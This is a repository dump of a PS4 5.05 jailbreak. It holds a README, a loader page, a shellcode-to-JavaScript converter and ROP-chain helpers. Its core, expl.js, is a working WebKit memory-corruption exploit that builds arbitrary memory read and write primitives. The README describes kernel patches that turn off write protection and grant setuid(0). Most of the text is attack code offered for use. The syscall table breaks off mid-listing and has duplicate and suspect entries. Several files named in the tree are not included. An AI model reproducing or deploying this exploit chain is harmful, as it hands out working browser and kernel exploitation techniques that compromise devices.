├── .nojekyll
├── docs
    └── CNAME
├── js_shellcode.py
├── README.md
├── index.html
├── rop.js
├── expl.js
├── syscalls.js
├── userland.js
├── kernel.js
└── homebrew.js


/.nojekyll:
--------------------------------------------------------------------------------
1 | 
2 | 


--------------------------------------------------------------------------------
/docs/CNAME:
--------------------------------------------------------------------------------
1 | 
2 | 


--------------------------------------------------------------------------------
/js_shellcode.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | from struct import pack,unpack
 3 | import argparse
 4 | 
 5 | def swap32(i):
 6 |   return unpack("<I", pack(">I", i))[0]
 7 | 
 8 | parser = argparse.ArgumentParser(description=__doc__, formatter_class=argparse.ArgumentDefaultsHelpFormatter)
 9 | parser.add_argument("file", type=argparse.FileType('rb'), help="specify binary file")
10 | parser.add_argument("buffer", type=str, help="name of buffer to write shellcode to")
11 | parser.add_argument("-b", "--blocksize", type=int, required=False, default=30000, help="specify block size")
12 | parser.add_argument("-o", "--output", type=str, required=False, default='stdout', help="output file")
13 | args = parser.parse_args()
14 | if args.output == "stdout":
15 |   from sys import stdout as output
16 | else:
17 |   output = open(args.output,'w')
18 | assert args.blocksize > 0, "block size must be positive"
19 | 
20 | block = args.file.read(args.blocksize)
21 | hexStr = ""
22 | for blockOffset,ch in enumerate(block):
23 |   if isinstance(ch,int):
24 |     o = ch
25 |   else:
26 |     o = ord(ch)
27 |   hexStr += format(o, 'x').zfill(2)
28 |   if blockOffset % 4 == 0:
29 |     hexStr += "|"
30 | 
31 | output.write("function writeHomebrewEN(p, %s) {\n" % args.buffer)
32 | for byteIndex,byteSet in enumerate(hexStr.split('|')[:-1]):
33 |   byte = int(byteSet, 16)
34 |   byte = format(swap32(byte), 'x').zfill(8) # Little Endian Pls
35 |   output.write("  p.write4(%s.add32(0x%s), 0x%s);\n" % (args.buffer, str(format((byteIndex*4), 'x').zfill(8)), str(byte)))
36 | output.write("}")
37 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # PS4 5.05 Kernel Exploit
 2 | ---
 3 | ## Summary
 4 | In this project you will find a full implementation of the second "bpf" kernel exploit for the PlayStation 4 on 5.05. It will allow you to run arbitrary code as kernel, to allow jailbreaking and kernel-level modifications to the system. This exploit also contains autolaunching code for Mira and Vortex's HEN payload. Subsequent loads will launch the usual payload launcher.
 5 | 
 6 | This bug was discovered by qwertyoruiopz, and can be found hosted on his website [here](http://crack.bargains/505k/). The [GitHub Pages site](https://cryptogenic.github.io/PS4-5.05-Kernel-Exploit/) automatically generated from this repository should also work.
 7 | 
 8 | ## Patches Included
 9 | The following patches are made by default in the kernel ROP chain:
10 | 1) Disable kernel write protection
11 | 2) Allow RWX (read-write-execute) memory mapping
12 | 3) Syscall instruction allowed anywhere
13 | 4) Dynamic Resolving (`sys_dynlib_dlsym`) allowed from any process
14 | 4) Custom system call #11 (`kexec()`) to execute arbitrary code in kernel mode
15 | 5) Allow unprivileged users to call `setuid(0)` successfully. Works as a status check, doubles as a privilege escalation.
16 | 
17 | ## Payloads included
18 | 1) Vortex's HEN (Homebrew Enabler)
19 | 2) Mira
20 | 
21 | ## Notes
22 | - The page will crash on successful kernel exploitation, this is normal
23 | 
24 | 
25 | ## Contributors
26 | Massive credits to the following:
27 | 
28 | - [qwertyoruiopz](https://twitter.com/qwertyoruiopz)
29 | - [Flatz](https://twitter.com/flat_z)
30 | - [Vortex](https://github.com/xvortex)
31 | - [OpenOrbis Team](https://github.com/OpenOrbis/)
32 | - Anonymous
33 | 


--------------------------------------------------------------------------------
/index.html:
--------------------------------------------------------------------------------
  1 | <!DOCTYPE html>
  2 | <html>
  3 | <head>
  4 |   <title>PS4Brew 5.05</title>
  5 |   <meta name="viewport" content="width=device-width, initial-scale=1">
  6 |   <style>
  7 |     .loader {
  8 |       position: absolute;
  9 |       left: 50%;
 10 |       top: 50%;
 11 |       margin: -75px 0 0 -75px;
 12 | 
 13 |       border: 10px solid #f3f3f3;
 14 |       border-radius: 50%;
 15 |       border-top: 10px solid #044595;
 16 |       border-left: 10px solid #044595;
 17 |       width: 120px;
 18 |       height: 120px;
 19 | 
 20 |       -webkit-animation: spin 1s linear infinite;
 21 |     }
 22 | 
 23 |     .info {
 24 |       overflow: hidden;
 25 |       position: fixed;
 26 |       position: absolute;
 27 |       top: 50%;
 28 |       left: 50%;
 29 | 
 30 |       font-size: 45px;
 31 |       font-family: sans-serif;
 32 | 
 33 |       transform: translate(-50%, -50%);
 34 |     }
 35 | 
 36 |     .credits {
 37 |       overflow: hidden;
 38 |       position: fixed;
 39 |       position: absolute;
 40 |       top: 90%;
 41 |       left: 50%;
 42 | 
 43 |       font-size: 16px;
 44 |       font-family: sans-serif;
 45 |       text-align: center;
 46 | 
 47 |       transform: translate(-50%, -90%);
 48 |     }
 49 | 
 50 |     @-webkit-keyframes spin {
 51 |       0% { -webkit-transform: rotate(0deg); }
 52 |       100% { -webkit-transform: rotate(360deg); }
 53 |     }
 54 |   </style>
 55 | </head>
 56 | <body style="margin:0;">
 57 |   <script>
 58 |     window.didload = 0;
 59 |     window.didpost = 0;
 60 | 
 61 |     window.onload = function () {
 62 |       window.didload = 1;
 63 |       if (window.didpost == 1)
 64 |         setTimeout(window.stage2, 1500);
 65 |     }
 66 |     window.postExpl = function () {
 67 |       window.didpost = 1;
 68 |       if (window.didload == 1)
 69 |         setTimeout(window.stage2, 1500);
 70 |     }
 71 | 
 72 |     function allset() {
 73 |       document.getElementById("loader").style.display = "none";
 74 |       document.getElementById("allset").style.display = "block";
 75 |     }
 76 | 
 77 |     function awaitpl() {
 78 |       document.getElementById("loader").style.display = "none";
 79 |       document.getElementById("awaiting").style.display = "block";
 80 |     }
 81 | 
 82 |     function fail(info) {
 83 |       document.getElementById("loader").style.display = "none";
 84 |       document.getElementById("fail").style.display = "block";
 85 |     }
 86 |   </script>
 87 | 
 88 |   <div id="loader" class="loader"></div>
 89 | 
 90 |   <div id="awaiting" class="info" style="display:none;">
 91 |     Awaiting Payload...
 92 |   </div>
 93 | 
 94 |   <div id="allset" class="info" style="display:none;">
 95 |     You're all set!
 96 |   </div>
 97 | 
 98 |   <div id="fail" class="info" style="display:none;">
 99 |     Something went wrong :(
100 |   </div>
101 | 
102 |   <div id="badfw" class="info" style="display:none;">
103 |     Only firmware 5.05 is supported!
104 |   </div>
105 | 
106 |   <div id="footer" class="credits">
107 |     <ul style="list-style: none;padding-left:0">
108 |       <li>Bug from qwertyoruiopz</li>
109 |       <li>Homebrew thanks to flatz, xvortex</li>
110 |       <li>Implementation by specter</li>
111 |       <li><3 OpenOrbis Team</li>
112 |     </ul>
113 |   </div>
114 | 
115 |   <script src="./rop.js"></script>
116 |   <script src="./syscalls.js"></script>
117 |   <script src="./expl.js"></script>
118 |   <script src="./userland.js"></script>
119 |   <script src="./homebrew.js"></script>
120 |   <script src="./mira.js"></script>
121 |   <pre id="console"></pre>
122 | </body>
123 | </html>
124 | 


--------------------------------------------------------------------------------
/rop.js:
--------------------------------------------------------------------------------
  1 | // Basic memory functions
  2 | function malloc(size)
  3 | {
  4 |   var backing = new Uint8Array(0x10000 + size);
  5 | 
  6 |   window.nogc.push(backing);
  7 | 
  8 |   var ptr     = p.read8(p.leakval(backing).add32(0x10));
  9 |   ptr.backing = backing;
 10 | 
 11 |   return ptr;
 12 | }
 13 | 
 14 | function mallocu32(size) {
 15 |   var backing = new Uint8Array(0x10000 + size * 4);
 16 | 
 17 |   window.nogc.push(backing);
 18 | 
 19 |   var ptr     = p.read8(p.leakval(backing).add32(0x10));
 20 |   ptr.backing = new Uint32Array(backing.buffer);
 21 | 
 22 |   return ptr;
 23 | }
 24 | 
 25 | function stringify(str)
 26 | {
 27 |   var bufView = new Uint8Array(str.length + 1);
 28 | 
 29 |   for(var i=0; i < str.length; i++) {
 30 |       bufView[i] = str.charCodeAt(i) & 0xFF;
 31 |   }
 32 | 
 33 |   window.nogc.push(bufView);
 34 |   return p.read8(p.leakval(bufView).add32(0x10));
 35 | }
 36 | 
 37 | // Class for quickly creating a kernel ROP chain
 38 | var krop = function (p, addr) {
 39 |   // Contains base and stack pointer for fake stack (this.stackBase = RBP, this.stackPointer = RSP)
 40 |   this.stackBase    = addr;
 41 |   this.stackPointer = 0;
 42 | 
 43 |   // Push instruction / value onto fake stack
 44 |   this.push = function (val) {
 45 |     p.write8(this.stackBase.add32(this.stackPointer), val);
 46 |     this.stackPointer += 8;
 47 |   };
 48 | 
 49 |   // Write to address with value (helper function)
 50 |   this.write64 = function (addr, val) {
 51 |     this.push(window.gadgets["pop rdi"]);
 52 |     this.push(addr);
 53 |     this.push(window.gadgets["pop rax"]);
 54 |     this.push(val);
 55 |     this.push(window.gadgets["mov [rdi], rax"]);
 56 |   }
 57 | 
 58 |   // Return krop object
 59 |   return this;
 60 | };
 61 | 
 62 | // Class for quickly creating and managing a ROP chain
 63 | window.rop = function() {
 64 |   this.stack        = new Uint32Array(0x10000);
 65 |   this.stackBase    = p.read8(p.leakval(this.stack).add32(0x10));
 66 |   this.count        = 0;
 67 | 
 68 |   this.clear = function() {
 69 |     this.count   = 0;
 70 |     this.runtime = undefined;
 71 | 
 72 |     for(var i = 0; i < 0xFF0 / 2; i++)
 73 |     {
 74 |       p.write8(this.stackBase.add32(i*8), 0);
 75 |     }
 76 |   };
 77 | 
 78 |   this.pushSymbolic = function() {
 79 |     this.count++;
 80 |     return this.count-1;
 81 |   }
 82 | 
 83 |   this.finalizeSymbolic = function(idx, val) {
 84 |     p.write8(this.stackBase.add32(idx * 8), val);
 85 |   }
 86 | 
 87 |   this.push = function(val) {
 88 |     this.finalizeSymbolic(this.pushSymbolic(), val);
 89 |   }
 90 | 
 91 |   this.push_write8 = function(where, what)
 92 |   {
 93 |       this.push(gadgets["pop rdi"]);
 94 |       this.push(where);
 95 |       this.push(gadgets["pop rsi"]);
 96 |       this.push(what);
 97 |       this.push(gadgets["mov [rdi], rsi"]);
 98 |   }
 99 | 
100 |   this.fcall = function (rip, rdi, rsi, rdx, rcx, r8, r9)
101 |   {
102 |     if (rdi != undefined) {
103 |       this.push(gadgets["pop rdi"]);
104 |       this.push(rdi);
105 |     }
106 | 
107 |     if (rsi != undefined) {
108 |       this.push(gadgets["pop rsi"]);
109 |       this.push(rsi);
110 |     }
111 | 
112 |     if (rdx != undefined) {
113 |       this.push(gadgets["pop rdx"]);
114 |       this.push(rdx);
115 |     }
116 | 
117 |     if (rcx != undefined) {
118 |       this.push(gadgets["pop rcx"]);
119 |       this.push(rcx);
120 |     }
121 | 
122 |     if (r8 != undefined) {
123 |       this.push(gadgets["pop r8"]);
124 |       this.push(r8);
125 |     }
126 |     
127 |     if (r9 != undefined) {
128 |       this.push(gadgets["pop r9"]);
129 |       this.push(r9);
130 |     }
131 | 
132 |     this.push(rip);
133 |     return this;
134 |   }
135 |   
136 |   this.run = function() {
137 |       var retv = p.loadchain(this, this.notimes);
138 |       this.clear();
139 |       return retv;
140 |   }
141 |   
142 |   return this;
143 | };


--------------------------------------------------------------------------------
/expl.js:
--------------------------------------------------------------------------------
  1 | function makeid() {
  2 |     var text = "";
  3 |     var possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
  4 | 
  5 |     for (var i = 0; i < 8; i++)
  6 |         text += possible.charAt(Math.floor(Math.random() * possible.length));
  7 | 
  8 |     return text;
  9 | };
 10 | 
 11 | var instancespr = [];
 12 | 
 13 | for (var i = 0; i < 4096; i++) {
 14 |     instancespr[i] = new Uint32Array(1);
 15 |     instancespr[i][makeid()] = 50057; /* spray 4-field Object InstanceIDs */
 16 | }
 17 | 
 18 | var _dview;
 19 | 
 20 | function u2d(low, hi) {
 21 |     if (!_dview) _dview = new DataView(new ArrayBuffer(16));
 22 |     _dview.setUint32(0, hi);
 23 |     _dview.setUint32(4, low);
 24 |     return _dview.getFloat64(0);
 25 | }
 26 | var dgc = function () {
 27 |     for (var i = 0; i < 0x100; i++) {
 28 |         new ArrayBuffer(0x100000);
 29 |     }
 30 | }
 31 | 
 32 | function int64(low, hi) {
 33 |     this.low = (low >>> 0);
 34 |     this.hi = (hi >>> 0);
 35 | 
 36 |     this.add32inplace = function (val) {
 37 |         var new_lo = (((this.low >>> 0) + val) & 0xFFFFFFFF) >>> 0;
 38 |         var new_hi = (this.hi >>> 0);
 39 | 
 40 |         if (new_lo < this.low) {
 41 |             new_hi++;
 42 |         }
 43 | 
 44 |         this.hi = new_hi;
 45 |         this.low = new_lo;
 46 |     }
 47 | 
 48 |     this.add32 = function (val) {
 49 |         var new_lo = (((this.low >>> 0) + val) & 0xFFFFFFFF) >>> 0;
 50 |         var new_hi = (this.hi >>> 0);
 51 | 
 52 |         if (new_lo < this.low) {
 53 |             new_hi++;
 54 |         }
 55 | 
 56 |         return new int64(new_lo, new_hi);
 57 |     }
 58 | 
 59 |     this.sub32 = function (val) {
 60 |         var new_lo = (((this.low >>> 0) - val) & 0xFFFFFFFF) >>> 0;
 61 |         var new_hi = (this.hi >>> 0);
 62 | 
 63 |         if (new_lo > (this.low) & 0xFFFFFFFF) {
 64 |             new_hi--;
 65 |         }
 66 | 
 67 |         return new int64(new_lo, new_hi);
 68 |     }
 69 | 
 70 |     this.sub32inplace = function (val) {
 71 |         var new_lo = (((this.low >>> 0) - val) & 0xFFFFFFFF) >>> 0;
 72 |         var new_hi = (this.hi >>> 0);
 73 | 
 74 |         if (new_lo > (this.low) & 0xFFFFFFFF) {
 75 |             new_hi--;
 76 |         }
 77 | 
 78 |         this.hi = new_hi;
 79 |         this.low = new_lo;
 80 |     }
 81 | 
 82 |     this.and32 = function (val) {
 83 |         var new_lo = this.low & val;
 84 |         var new_hi = this.hi;
 85 |         return new int64(new_lo, new_hi);
 86 |     }
 87 | 
 88 |     this.and64 = function (vallo, valhi) {
 89 |         var new_lo = this.low & vallo;
 90 |         var new_hi = this.hi & valhi;
 91 |         return new int64(new_lo, new_hi);
 92 |     }
 93 | 
 94 |     this.toString = function (val) {
 95 |         val = 16;
 96 |         var lo_str = (this.low >>> 0).toString(val);
 97 |         var hi_str = (this.hi >>> 0).toString(val);
 98 | 
 99 |         if (this.hi == 0)
100 |             return lo_str;
101 |         else
102 |             lo_str = zeroFill(lo_str, 8)
103 | 
104 |         return hi_str + lo_str;
105 |     }
106 | 
107 |     this.toPacked = function () {
108 |         return {
109 |             hi: this.hi,
110 |             low: this.low
111 |         };
112 |     }
113 | 
114 |     this.setPacked = function (pck) {
115 |         this.hi = pck.hi;
116 |         this.low = pck.low;
117 |         return this;
118 |     }
119 | 
120 |     return this;
121 | }
122 | 
123 | function zeroFill(number, width) {
124 |     width -= number.toString().length;
125 | 
126 |     if (width > 0) {
127 |         return new Array(width + (/\./.test(number) ? 2 : 1)).join('0') + number;
128 |     }
129 | 
130 |     return number + ""; // always return a string
131 | }
132 | 
133 | var nogc = [];
134 | 
135 | var fail = function () {
136 |     alert.apply(null, arguments);
137 |     throw "fail";
138 | }
139 | 
140 | // Target JSObject for overlap
141 | var tgt = {
142 |     a: 0,
143 |     b: 0,
144 |     c: 0,
145 |     d: 0
146 | }
147 | 
148 | var y = new ImageData(1, 0x4000)
149 | postMessage("", "*", [y.data.buffer]);
150 | 
151 | // Spray properties to ensure object is fastmalloc()'d and can be found easily later
152 | var props = {};
153 | 
154 | for (var i = 0;
155 |     (i < (0x4000 / 2));) {
156 |     props[i++] = {
157 |         value: 0x42424242
158 |     };
159 |     props[i++] = {
160 |         value: tgt
161 |     };
162 | }
163 | 
164 | var foundLeak = undefined;
165 | var foundIndex = 0;
166 | var maxCount = 0x100;
167 | 
168 | while (foundLeak == undefined && maxCount > 0) {
169 |     maxCount--;
170 | 
171 |     history.pushState(y, "");
172 | 
173 |     Object.defineProperties({}, props);
174 | 
175 |     var leak = new Uint32Array(history.state.data.buffer);
176 | 
177 |     for (var i = 0; i < leak.length - 6; i++) {
178 |         if (
179 |             leak[i] == 0x42424242 &&
180 |             leak[i + 0x1] == 0xFFFF0000 &&
181 |             leak[i + 0x2] == 0x00000000 &&
182 |             leak[i + 0x3] == 0x00000000 &&
183 |             leak[i + 0x4] == 0x00000000 &&
184 |             leak[i + 0x5] == 0x00000000 &&
185 |             leak[i + 0x6] == 0x0000000E &&
186 |             leak[i + 0x7] == 0x00000000 &&
187 |             leak[i + 0xA] == 0x00000000 &&
188 |             leak[i + 0xB] == 0x00000000 &&
189 |             leak[i + 0xC] == 0x00000000 &&
190 |             leak[i + 0xD] == 0x00000000 &&
191 |             leak[i + 0xE] == 0x0000000E &&
192 |             leak[i + 0xF] == 0x00000000
193 |         ) {
194 |             foundIndex = i;
195 |             foundLeak = leak;
196 |             break;
197 |         }
198 |     }
199 | }
200 | 
201 | if (!foundLeak) {
202 |     failed = true
203 |     fail("Failed to find leak!")
204 | }
205 | 
206 | var firstLeak = Array.prototype.slice.call(foundLeak, foundIndex, foundIndex + 0x40);
207 | var leakJSVal = new int64(firstLeak[8], firstLeak[9]);
208 | 
209 | Array.prototype.__defineGetter__(100, () => 1);
210 | 
211 | var f = document.body.appendChild(document.createElement('iframe'));
212 | var a = new f.contentWindow.Array(13.37, 13.37);
213 | var b = new f.contentWindow.Array(u2d(leakJSVal.low + 0x10, leakJSVal.hi), 13.37);
214 | 
215 | var master = new Uint32Array(0x1000);
216 | var slave = new Uint32Array(0x1000);
217 | var leakval_u32 = new Uint32Array(0x1000);
218 | var leakval_helper = [slave, 2, 3, 4, 5, 6, 7, 8, 9, 10];
219 | 
220 | // Create fake ArrayBufferView
221 | tgt.a = u2d(2048, 0x1602300);
222 | tgt.b = 0;
223 | tgt.c = leakval_helper;
224 | tgt.d = 0x1337;
225 | 
226 | var c = Array.prototype.concat.call(a, b);
227 | document.body.removeChild(f);
228 | var hax = c[0];
229 | c[0] = 0;
230 | 
231 | tgt.c = c;
232 | 
233 | hax[2] = 0;
234 | hax[3] = 0;
235 | 
236 | Object.defineProperty(Array.prototype, 100, {
237 |     get: undefined
238 | });
239 | 
240 | tgt.c = leakval_helper;
241 | var butterfly = new int64(hax[2], hax[3]);
242 | butterfly.low += 0x10;
243 | 
244 | tgt.c = leakval_u32;
245 | var lkv_u32_old = new int64(hax[4], hax[5]);
246 | hax[4] = butterfly.low;
247 | hax[5] = butterfly.hi;
248 | // Setup read/write primitive
249 | 
250 | tgt.c = master;
251 | hax[4] = leakval_u32[0];
252 | hax[5] = leakval_u32[1];
253 | 
254 | var addr_to_slavebuf = new int64(master[4], master[5]);
255 | tgt.c = leakval_u32;
256 | hax[4] = lkv_u32_old.low;
257 | hax[5] = lkv_u32_old.hi;
258 | 
259 | tgt.c = 0;
260 | hax = 0;
261 | 
262 | var prim = {
263 |     write8: function (addr, val) {
264 |         master[4] = addr.low;
265 |         master[5] = addr.hi;
266 | 
267 |         if (val instanceof int64) {
268 |             slave[0] = val.low;
269 |             slave[1] = val.hi;
270 |         } else {
271 |             slave[0] = val;
272 |             slave[1] = 0;
273 |         }
274 | 
275 |         master[4] = addr_to_slavebuf.low;
276 |         master[5] = addr_to_slavebuf.hi;
277 |     },
278 | 
279 |     write4: function (addr, val) {
280 |         master[4] = addr.low;
281 |         master[5] = addr.hi;
282 | 
283 |         slave[0] = val;
284 | 
285 |         master[4] = addr_to_slavebuf.low;
286 |         master[5] = addr_to_slavebuf.hi;
287 |     },
288 | 
289 |     read8: function (addr) {
290 |         master[4] = addr.low;
291 |         master[5] = addr.hi;
292 | 
293 |         var rtv = new int64(slave[0], slave[1]);
294 | 
295 |         master[4] = addr_to_slavebuf.low;
296 |         master[5] = addr_to_slavebuf.hi;
297 | 
298 |         return rtv;
299 |     },
300 | 
301 |     read4: function (addr) {
302 |         master[4] = addr.low;
303 |         master[5] = addr.hi;
304 | 
305 |         var rtv = slave[0];
306 | 
307 |         master[4] = addr_to_slavebuf.low;
308 |         master[5] = addr_to_slavebuf.hi;
309 | 
310 |         return rtv;
311 |     },
312 | 
313 |     leakval: function (jsval) {
314 |         leakval_helper[0] = jsval;
315 |         var rtv = this.read8(butterfly);
316 |         this.write8(butterfly, new int64(0x41414141, 0xffff0000));
317 | 
318 |         return rtv;
319 |     },
320 | 
321 |     createval: function (jsval) {
322 |         this.write8(butterfly, jsval);
323 |         var rt = leakval_helper[0];
324 |         this.write8(butterfly, new int64(0x41414141, 0xffff0000));
325 |         return rt;
326 |     }
327 | };
328 | 
329 | window.primitives = prim;
330 | if (window.postExpl) window.postExpl();
331 | 


--------------------------------------------------------------------------------
/syscalls.js:
--------------------------------------------------------------------------------
  1 | window.nameforsyscall = swapkeyval(window.syscallnames);
  2 | window.syscalls       = {};
  3 | 
  4 | /* Get syscall name by index */
  5 | function swapkeyval(json){
  6 |   var ret = {};
  7 |   for(var key in json){
  8 |     if (json.hasOwnProperty(key)) {
  9 |       ret[json[key]] = key;
 10 |     }
 11 |   }
 12 |   return ret;
 13 | }
 14 | 
 15 | /* A long ass map of system call names -> number, you shouldn't need to touch this */
 16 | window.syscallnames =
 17 | {
 18 |   "sys_exit": 1,
 19 |   "sys_fork": 2,
 20 |   "sys_read": 3,
 21 |   "sys_write": 4,
 22 |   "sys_open": 5,
 23 |   "sys_close": 6,
 24 |   "sys_wait4": 7,
 25 |   "sys_unlink": 10,
 26 |   "sys_chdir": 12,
 27 |   "sys_chmod": 15,
 28 |   "sys_getpid": 20,
 29 |   "sys_setuid": 23,
 30 |   "sys_getuid": 24,
 31 |   "sys_geteuid": 25,
 32 |   "sys_recvmsg": 27,
 33 |   "sys_sendmsg": 28,
 34 |   "sys_recvfrom": 29,
 35 |   "sys_accept": 30,
 36 |   "sys_getpeername": 31,
 37 |   "sys_getsockname": 32,
 38 |   "sys_access": 33,
 39 |   "sys_chflags": 34,
 40 |   "sys_fchflags": 35,
 41 |   "sys_sync": 36,
 42 |   "sys_kill": 37,
 43 |   "sys_stat": 38,
 44 |   "sys_getppid": 39,
 45 |   "sys_dup": 41,
 46 |   "sys_pipe": 42,
 47 |   "sys_getegid": 43,
 48 |   "sys_profil": 44,
 49 |   "sys_getgid": 47,
 50 |   "sys_getlogin": 49,
 51 |   "sys_setlogin": 50,
 52 |   "sys_sigaltstack": 53,
 53 |   "sys_ioctl": 54,
 54 |   "sys_reboot": 55,
 55 |   "sys_revoke": 56,
 56 |   "sys_execve": 59,
 57 |   "sys_msync": 65,
 58 |   "sys_munmap": 73,
 59 |   "sys_mprotect": 74,
 60 |   "sys_madvise": 75,
 61 |   "sys_mincore": 78,
 62 |   "sys_getgroups": 79,
 63 |   "sys_setgroups": 80,
 64 |   "sys_setitimer": 83,
 65 |   "sys_getitimer": 86,
 66 |   "sys_getdtablesize": 89,
 67 |   "sys_dup2": 90,
 68 |   "sys_fcntl": 92,
 69 |   "sys_select": 93,
 70 |   "sys_fsync": 95,
 71 |   "sys_setpriority": 96,
 72 |   "sys_socket": 97,
 73 |   "sys_connect": 98,
 74 |   "sys_getpriority": 100,
 75 |   "sys_send": 101,
 76 |   "sys_recv": 102,
 77 |   "sys_bind": 104,
 78 |   "sys_setsockopt": 105,
 79 |   "sys_listen": 106,
 80 |   "sys_recvmsg": 113,
 81 |   "sys_sendmsg": 114,
 82 |   "sys_gettimeofday": 116,
 83 |   "sys_getrusage": 117,
 84 |   "sys_getsockopt": 118,
 85 |   "sys_readv": 120,
 86 |   "sys_writev": 121,
 87 |   "sys_settimeofday": 122,
 88 |   "sys_fchmod": 124,
 89 |   "sys_recvfrom": 125,
 90 |   "sys_setreuid": 126,
 91 |   "sys_setregid": 127,
 92 |   "sys_rename": 128,
 93 |   "sys_flock": 131,
 94 |   "sys_sendto": 133,
 95 |   "sys_shutdown": 134,
 96 |   "sys_socketpair": 135,
 97 |   "sys_mkdir": 136,
 98 |   "sys_rmdir": 137,
 99 |   "sys_utimes": 138,
100 |   "sys_adjtime": 140,
101 |   "sys_getpeername": 141,
102 |   "sys_setsid": 147,
103 |   "sys_sysarch": 165,
104 |   "sys_setegid": 182,
105 |   "sys_seteuid": 183,
106 |   "sys_fstat": 189,
107 |   "sys_lstat": 190,
108 |   "sys_pathconf": 191,
109 |   "sys_fpathconf": 192,
110 |   "sys_getrlimit": 194,
111 |   "sys_setrlimit": 195,
112 |   "sys_getdirentries": 196,
113 |   "sys___sysctl": 202,
114 |   "sys_mlock": 203,
115 |   "sys_munlock": 204,
116 |   "sys_futimes": 206,
117 |   "sys_poll": 209,
118 |   "sys_clock_gettime": 232,
119 |   "sys_clock_settime": 233,
120 |   "sys_clock_getres": 234,
121 |   "sys_ktimer_create": 235,
122 |   "sys_ktimer_delete": 236,
123 |   "sys_ktimer_settime": 237,
124 |   "sys_ktimer_gettime": 238,
125 |   "sys_ktimer_getoverrun": 239,
126 |   "sys_nanosleep": 240,
127 |   "sys_rfork": 251,
128 |   "sys_issetugid": 253,
129 |   "sys_getdents": 272,
130 |   "sys_preadv": 289,
131 |   "sys_pwritev": 290,
132 |   "sys_getsid": 310,
133 |   "sys_aio_suspend": 315,
134 |   "sys_mlockall": 324,
135 |   "sys_munlockall": 325,
136 |   "sys_sched_setparam": 327,
137 |   "sys_sched_getparam": 328,
138 |   "sys_sched_setscheduler": 329,
139 |   "sys_sched_getscheduler": 330,
140 |   "sys_sched_yield": 331,
141 |   "sys_sched_get_priority_max": 332,
142 |   "sys_sched_get_priority_min": 333,
143 |   "sys_sched_rr_get_interval": 334,
144 |   "sys_utrace": 335,
145 |   "sys_sigprocmask": 340,
146 |   "sys_sigprocmask": 340,
147 |   "sys_sigsuspend": 341,
148 |   "sys_sigpending": 343,
149 |   "sys_sigtimedwait": 345,
150 |   "sys_sigwaitinfo": 346,
151 |   "sys_kqueue": 362,
152 |   "sys_kevent": 363,
153 |   "sys_uuidgen": 392,
154 |   "sys_sendfile": 393,
155 |   "sys_fstatfs": 397,
156 |   "sys_ksem_close": 400,
157 |   "sys_ksem_post": 401,
158 |   "sys_ksem_wait": 402,
159 |   "sys_ksem_trywait": 403,
160 |   "sys_ksem_init": 404,
161 |   "sys_ksem_open": 405,
162 |   "sys_ksem_unlink": 406,
163 |   "sys_ksem_getvalue": 407,
164 |   "sys_ksem_destroy": 408,
165 |   "sys_sigaction": 416,
166 |   "sys_sigreturn": 417,
167 |   "sys_getcontext": 421,
168 |   "sys_setcontext": 422,
169 |   "sys_swapcontext": 423,
170 |   "sys_sigwait": 429,
171 |   "sys_thr_create": 430,
172 |   "sys_thr_exit": 431,
173 |   "sys_thr_self": 432,
174 |   "sys_thr_kill": 433,
175 |   "sys_ksem_timedwait": 441,
176 |   "sys_thr_suspend": 442,
177 |   "sys_thr_wake": 443,
178 |   "sys_kldunloadf": 444,
179 |   "sys__umtx_op": 454,
180 |   "sys__umtx_op": 454,
181 |   "sys_thr_new": 455,
182 |   "sys_sigqueue": 456,
183 |   "sys_thr_set_name": 464,
184 |   "sys_rtprio_thread": 466,
185 |   "sys_pread": 475,
186 |   "sys_pwrite": 476,
187 |   "sys_mmap": 477,
188 |   "sys_lseek": 478,
189 |   "sys_truncate": 479,
190 |   "sys_ftruncate": 480,
191 |   "sys_thr_kill2": 481,
192 |   "sys_shm_open": 482,
193 |   "sys_shm_unlink": 483,
194 |   "sys_cpuset_getid": 486,
195 |   "sys_cpuset_getaffinity": 487,
196 |   "sys_cpuset_setaffinity": 488,
197 |   "sys_openat": 499,
198 |   "sys_pselect": 522,
199 | 
200 |   "sys_regmgr_call": 532,
201 |   "sys_jitshm_create": 533,
202 |   "sys_jitshm_alias": 534,
203 |   "sys_dl_get_list": 535,
204 |   "sys_dl_get_info": 536,
205 |   "sys_dl_notify_event": 537,
206 |   "sys_evf_create": 538,
207 |   "sys_evf_delete": 539,
208 |   "sys_evf_open": 540,
209 |   "sys_evf_close": 541,
210 |   "sys_evf_wait": 542,
211 |   "sys_evf_trywait": 543,
212 |   "sys_evf_set": 544,
213 |   "sys_evf_clear": 545,
214 |   "sys_evf_cancel": 546,
215 |   "sys_query_memory_protection": 47,
216 |   "sys_batch_map": 548,
217 |   "sys_osem_create": 549,
218 |   "sys_osem_delete": 550,
219 |   "sys_osem_open": 551,
220 |   "sys_osem_close": 552,
221 |   "sys_osem_wait": 553,
222 |   "sys_osem_trywait": 554,
223 |   "sys_osem_post": 555,
224 |   "sys_osem_cancel": 556,
225 |   "sys_namedobj_create": 557,
226 |   "sys_namedobj_delete": 558,
227 |   "sys_set_vm_container": 559,
228 |   "sys_debug_init": 560,
229 |   "sys_suspend_process": 561,
230 |   "sys_resume_process": 562,
231 |   "sys_opmc_enable": 563,
232 |   "sys_opmc_disable": 564,
233 |   "sys_opmc_set_ctl": 565,
234 |   "sys_opmc_set_ctr": 566,
235 |   "sys_opmc_get_ctr": 567,
236 |   "sys_budget_create": 568,
237 |   "sys_budget_delete": 569,
238 |   "sys_budget_get": 570,
239 |   "sys_budget_set": 571,
240 |   "sys_virtual_query": 572,
241 |   "sys_mdbg_call": 573,
242 |   "sys_sblock_create": 574,
243 |   "sys_sblock_delete": 575,
244 |   "sys_sblock_enter": 576,
245 |   "sys_sblock_exit": 577,
246 |   "sys_sblock_xenter": 578,
247 |   "sys_sblock_xexit": 579,
248 |   "sys_eport_create": 580,
249 |   "sys_eport_delete": 581,
250 |   "sys_eport_trigger": 582,
251 |   "sys_eport_open": 583,
252 |   "sys_eport_close": 584,
253 |   "sys_is_in_sandbox": 585,
254 |   "sys_dmem_container": 586,
255 |   "sys_get_authinfo": 587,
256 |   "sys_mname": 588,
257 |   "sys_dynlib_dlopen": 589,
258 |   "sys_dynlib_dlclose": 590,
259 |   "sys_dynlib_dlsym": 591,
260 |   "sys_dynlib_get_list": 592,
261 |   "sys_dynlib_get_info": 593,
262 |   "sys_dynlib_load_prx": 594,
